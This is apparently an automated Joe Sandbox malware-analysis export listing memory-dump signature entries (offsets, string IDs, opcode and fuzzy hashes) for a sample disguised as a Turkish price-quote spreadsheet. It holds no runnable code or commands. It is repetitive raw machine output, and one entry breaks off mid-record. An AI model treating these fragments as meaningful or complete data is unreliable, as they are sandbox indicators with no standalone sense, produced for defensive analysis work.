                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: paq
                                                  • API String ID: 0-3273118895
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4|bq
                                                  • API String ID: 0-1932486993
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TJbq
                                                  • API String ID: 0-1760495472
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TJbq
                                                  • API String ID: 0-1760495472
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: l
                                                  • API String ID: 0-2517025534
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4|bq
                                                  • API String ID: 0-1932486993
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8
                                                  • API String ID: 0-4194326291
                                                  • Opcode ID: 94dc07e3ab968afa6a7647d06cd25ed7abee4ba852d1d4d6f9b3cb1928fbcd4c
                                                  • Instruction ID: c9be1b77c48510ca3bcbfdf49670a964eb4dcfccc6b2d23d4d341c08a6cdc29b
                                                  • Opcode Fuzzy Hash: 94dc07e3ab968afa6a7647d06cd25ed7abee4ba852d1d4d6f9b3cb1928fbcd4c
                                                  • Instruction Fuzzy Hash: 9251D374905219CEDBA4CF59C888BE9B7F2BB49314F54A0E6D14DB3280D7745AC4CF15
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: 5864f408deb6347ea1b8ded33cd636a08455c20b37c570c07ae26a9c483c7c3c
                                                  • Instruction ID: 25fb2156f5c08c06916e7d46a3445711a7f9b206c669a201522cf79fe2042b7a
                                                  • Opcode Fuzzy Hash: 5864f408deb6347ea1b8ded33cd636a08455c20b37c570c07ae26a9c483c7c3c
                                                  • Instruction Fuzzy Hash: EB31B6357042049FCF14CFA4D988D697BB6FF8C310B054569E9099B375CA31DC02EBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: 2070185c5798f77726d354a27551d8570e138f408358f7c055cec7ca52c87e72
                                                  • Instruction ID: 4ffc2f85ab94ab0263e52320bd1a6c72640f1e6afcf1416cb22145ff91a46c2c
                                                  • Opcode Fuzzy Hash: 2070185c5798f77726d354a27551d8570e138f408358f7c055cec7ca52c87e72
                                                  • Instruction Fuzzy Hash: BB319530B102145BCB19AB69D898A7EBBBBEFD9700F50442EE016DB3A4CF759C06D791
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p<]q
                                                  • API String ID: 0-1327301063
                                                  • Opcode ID: 27dc9788cfd3a1c325b35b84377828ab4737be9cdeccbdc5854ae6991eb65377
                                                  • Instruction ID: 17b98eef4994480f46dddf93e966a655a872bc18dc63f7c980ac31dd1dd8960f
                                                  • Opcode Fuzzy Hash: 27dc9788cfd3a1c325b35b84377828ab4737be9cdeccbdc5854ae6991eb65377
                                                  • Instruction Fuzzy Hash: 7B2180713081549FCB05DF29C844EAA7BE9BF8A200B184496F896CB361DA71DC51CB30
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [
                                                  • API String ID: 0-784033777
                                                  • Opcode ID: cd08b364d70ba9e7975539dc94c64e23c5a6684c4ce013d2f2d4263e5db7d625
                                                  • Instruction ID: ad364bfe6e41dd7621c899271b19a5e3b3d753edf50bb4e171727a21c3ef82c7
                                                  • Opcode Fuzzy Hash: cd08b364d70ba9e7975539dc94c64e23c5a6684c4ce013d2f2d4263e5db7d625
                                                  • Instruction Fuzzy Hash: 0631CB78A062288FDB60CF18D9889D9B7F1FF0A304F5085D6E819A7755D7349E80CF02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: a4fe269903e40372da259f6565682dfe6582d25c23760946579c9d4473ae5b2e
                                                  • Instruction ID: dc2ebc55b707490fe3273e43a3ea1629b266115a5a67fd89e8850a74899ca0cf
                                                  • Opcode Fuzzy Hash: a4fe269903e40372da259f6565682dfe6582d25c23760946579c9d4473ae5b2e
                                                  • Instruction Fuzzy Hash: 8121F6749022188FEB54DF69D884B9DBBF2FB49314F5042A9E00AA7394DB345EC5CF20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq
                                                  • API String ID: 0-538729646
                                                  • Opcode ID: 15a015dc524695b952b3f15b415240561493cbfba7504350a1e9c97b58af8214
                                                  • Instruction ID: fcce4ace4ae6f04618d51283154171005b47b0d7d37eb31b27d01773cb758676
                                                  • Opcode Fuzzy Hash: 15a015dc524695b952b3f15b415240561493cbfba7504350a1e9c97b58af8214
                                                  • Instruction Fuzzy Hash: 1D01C874302141AFD315DB6DE884B9ABBF6EFC9311F1580B5D10ACB2A4DB798C858B11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: q
                                                  • API String ID: 0-4110462503
                                                  • Opcode ID: 9e2166e18c1fe5f4f92f50adb1577d6229f6c1f838bba9743aa8464db4bf12ee
                                                  • Instruction ID: 501c6b526f83492b33c393cf957e23a50f8ebdc7b6923e6ec720d8f026f6a629
                                                  • Opcode Fuzzy Hash: 9e2166e18c1fe5f4f92f50adb1577d6229f6c1f838bba9743aa8464db4bf12ee
                                                  • Instruction Fuzzy Hash: 8A21B374911229CFEB64CF19C888BE8B7B2BB49305F1191EAD45DA7684DB749E84CF01
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq
                                                  • API String ID: 0-538729646
                                                  • Opcode ID: 178739d50bab0e799f62d63927867655614518a65a716ccf2dd5c87cc3adfb67
                                                  • Instruction ID: f12546a5a7a0c1e7f3fa03789b9262bfaecf7eb5a760a3deeb0b23a2da267508
                                                  • Opcode Fuzzy Hash: 178739d50bab0e799f62d63927867655614518a65a716ccf2dd5c87cc3adfb67
                                                  • Instruction Fuzzy Hash: 3B01A774302100AFD344DA6EE894B9ABBFAEBCC311F158075E20E872A8DB74DC858B51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 9
                                                  • API String ID: 0-2366072709
                                                  • Opcode ID: 4e37f74c3c7434fb4af98b8a482c65a652d4af79939f81a9910a940c2d2e01a2
                                                  • Instruction ID: 6dc46ce71e8b83a36023a19858848ad3b226301658c9d5d5e061f064a246138f
                                                  • Opcode Fuzzy Hash: 4e37f74c3c7434fb4af98b8a482c65a652d4af79939f81a9910a940c2d2e01a2
                                                  • Instruction Fuzzy Hash: 9911D0B4D4022ADFDB60CF64C894BEDBBB1AB48314F00A1E99559A7680EB305EC5DF00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: w
                                                  • API String ID: 0-476252946
                                                  • Opcode ID: d8435d52dcd577bc01ad67fe70a910d2c8a50f985305bd74df180335347da199
                                                  • Instruction ID: 3e7e994ab0c0b08b541e2ce228a815d078efdcd4df64e495e6dfb87cc0706ce1
                                                  • Opcode Fuzzy Hash: d8435d52dcd577bc01ad67fe70a910d2c8a50f985305bd74df180335347da199
                                                  • Instruction Fuzzy Hash: 5DF08CB59193489FD742DFA8D84528CBBF8FB0D201F1400E6E448D3262E2309D00DB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A
                                                  • API String ID: 0-3554254475
                                                  • Opcode ID: 4bc54112d4288e5655847e92efa75cbe17b62543b8d44c0dd287156ef4783866
                                                  • Instruction ID: 9bfa5073464cd69c2d187a06680e42e84758f1baf1130f05e83475838a473b37
                                                  • Opcode Fuzzy Hash: 4bc54112d4288e5655847e92efa75cbe17b62543b8d44c0dd287156ef4783866
                                                  • Instruction Fuzzy Hash: BA01AFB491622A9FCF64EF64D958BDDBBB1BB48700F0051E9A609A7251DB301E81CF04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: adcaaf87177839f15de3804aa345e43c379723d75e0a44379a846b31604ed9af
                                                  • Instruction ID: 6d98dbb2345f6da0eb81fe93b6b1df7af36b08ea9e80a69f55e626348a6ece2b
                                                  • Opcode Fuzzy Hash: adcaaf87177839f15de3804aa345e43c379723d75e0a44379a846b31604ed9af
                                                  • Instruction Fuzzy Hash: 2BF07AB690121DEFDB50CF95CD44FDDB7B9FB08304F10819AA509A7291D7759A86CF20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A
                                                  • API String ID: 0-3554254475
                                                  • Opcode ID: 4c1f0876e42cea7d245be433f2aab8f67b75b293fc6dc86cfdf90f1ec13bd830
                                                  • Instruction ID: 8dc6ec929e1fa6174d465d7a7298de7bb944df3390d2230214bd556916dfc993
                                                  • Opcode Fuzzy Hash: 4c1f0876e42cea7d245be433f2aab8f67b75b293fc6dc86cfdf90f1ec13bd830
                                                  • Instruction Fuzzy Hash: 32F06DB891622A9BDF61DF64D958BDDBBB1BB48700F0061A5A549A3280DB741EC1CF04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: M
                                                  • API String ID: 0-3664761504
                                                  • Opcode ID: e6200e3c5fd295594a8ecee7f35bd00a0317537c1fcded4ede87b11f46849610
                                                  • Instruction ID: b5f2be066416bb952d56b0592ba54e7a8ee5efcb8020ce9546d1e3d8cd941d7e
                                                  • Opcode Fuzzy Hash: e6200e3c5fd295594a8ecee7f35bd00a0317537c1fcded4ede87b11f46849610
                                                  • Instruction Fuzzy Hash: A0F058B094426ACFEB20DF19D848BEAB6B2FB05304F0054EAD02CA36C4DB785EC49F01
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: I
                                                  • API String ID: 0-3707901625
                                                  • Opcode ID: 5d928af4c316541093789a4a0bf1fe837c0f5570abb46dd0853183d80d7ede99
                                                  • Instruction ID: 13d18ce3a74bbc407e3c6cd0d6fa44f78137fee16e8474676851459ccfd1076d
                                                  • Opcode Fuzzy Hash: 5d928af4c316541093789a4a0bf1fe837c0f5570abb46dd0853183d80d7ede99
                                                  • Instruction Fuzzy Hash: 9FF05F74901228CFDB61DF64D888BEEBBB2AB09311F1451D9D409A2241CB755AC4DF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "
                                                  • API String ID: 0-123907689
                                                  • Opcode ID: 6b1cf860f66137382d23852de81034ba12196d5e91029b924d05cbe6f8c98004
                                                  • Instruction ID: 3ed30dd8bd19d47eefaabd0c40e85ee9593b669bc8c2ec3158dd8521fadf73d4
                                                  • Opcode Fuzzy Hash: 6b1cf860f66137382d23852de81034ba12196d5e91029b924d05cbe6f8c98004
                                                  • Instruction Fuzzy Hash: E6F0393180061BDBCF129F54D814ADEBB71FF58300F00868AE95933210EB30AAD6CF80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P
                                                  • API String ID: 0-3110715001
                                                  • Opcode ID: 8ba9c4a56ebdbb4e18394071004c5dec2dd28162d652c29380748635c08be941
                                                  • Instruction ID: 9459d7f7c9a6af5873677b0cbac0de29b9ad6748e5e6f406721df710517f9f7b
                                                  • Opcode Fuzzy Hash: 8ba9c4a56ebdbb4e18394071004c5dec2dd28162d652c29380748635c08be941
                                                  • Instruction Fuzzy Hash: 80F0C974C4836B8FCB619F14D95CBE9BBB1BB06319F1044E6E42A96251D7344E84DF12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: j
                                                  • API String ID: 0-2137352139
                                                  • Opcode ID: e311e8dabb207095a6599d95867ee8dd3bd513712e71ff9e3e5e55bdcba62406
                                                  • Instruction ID: 29bc701ea7f21b5d15f174b732b0e9d0c10a26f895add54cfa9f471136fbac6b
                                                  • Opcode Fuzzy Hash: e311e8dabb207095a6599d95867ee8dd3bd513712e71ff9e3e5e55bdcba62406
                                                  • Instruction Fuzzy Hash: ACD092B4E002188FDB10DF55C888A9DBBB6AF9A300F1050998484B7311DB7099818F0A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c423706fa69b960bce3a5ff0294dc108ee01efc24bab94b5bd49abadc107acd9
                                                  • Instruction ID: 4b36165d6774a77d496b1cce1b90d3a490afc59a023ca7873b3e730fecea74f0
                                                  • Opcode Fuzzy Hash: c423706fa69b960bce3a5ff0294dc108ee01efc24bab94b5bd49abadc107acd9
                                                  • Instruction Fuzzy Hash: DE12FB34B102198FCB14EF68C994A9DBBB2BF89300F5185A9D44AAB365DF70ED85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99252e99ff50bcd396201295efd76c14a66a43899d40a79459e6d007288516d6
                                                  • Instruction ID: 3e20ab15a015bc2679bca1589126e659defadb587b77b0dc81f7e39f417102fe
                                                  • Opcode Fuzzy Hash: 99252e99ff50bcd396201295efd76c14a66a43899d40a79459e6d007288516d6
                                                  • Instruction Fuzzy Hash: 94B17D7A540515EFCB0ACF94D944D95BBB2FF49310B0A81D4E6096F232C732E9A1EF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40ec02ec2ef078a350b8031c92a9430b13624a74aae0dbfb59b4a95a170f75d8
                                                  • Instruction ID: 599fce369b89f4eb6365a0897b06c0d920bf9e4961c8982ce852a05231ceac0b
                                                  • Opcode Fuzzy Hash: 40ec02ec2ef078a350b8031c92a9430b13624a74aae0dbfb59b4a95a170f75d8
                                                  • Instruction Fuzzy Hash: 25A19131A046969FCB25CF29C454E3ABBF2FF85310F298569E9968B751CB30EC42DB41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1534277058c54af26c944a01ca163c5c208bdf7089257ca949c93692e13d026
                                                  • Instruction ID: 71eadded8e3d586910268e99f897f47c565b483310db071adbb778793ca99570
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b70ff5576b4a74d062b58311be48e008163dc7f2b24de15e3c912578663d932
                                                  • Instruction ID: f25f4984453e6e7f7b2e11874881add976bb10818c195f3b5c768457f53afd3d
                                                  • Opcode Fuzzy Hash: 0b70ff5576b4a74d062b58311be48e008163dc7f2b24de15e3c912578663d932
                                                  • Instruction Fuzzy Hash: 2F410630B043459FCB25DF68C815AAEBFB2FF86710F10845AE655DB390DB309906CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1300ff61f15679753dc9ecb585da44ab05d72c02dd5a56dd7091a02883afb09
                                                  • Instruction ID: ad0aace84d5949a54cfffa72b1a20935cc0c4fdcf80d48d28cd852870c242931
                                                  • Opcode Fuzzy Hash: e1300ff61f15679753dc9ecb585da44ab05d72c02dd5a56dd7091a02883afb09
                                                  • Instruction Fuzzy Hash: FA419C75A00B859FCB21CF69C948E6EBBF2FF88300F048959D99283A50DB30E805DF61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
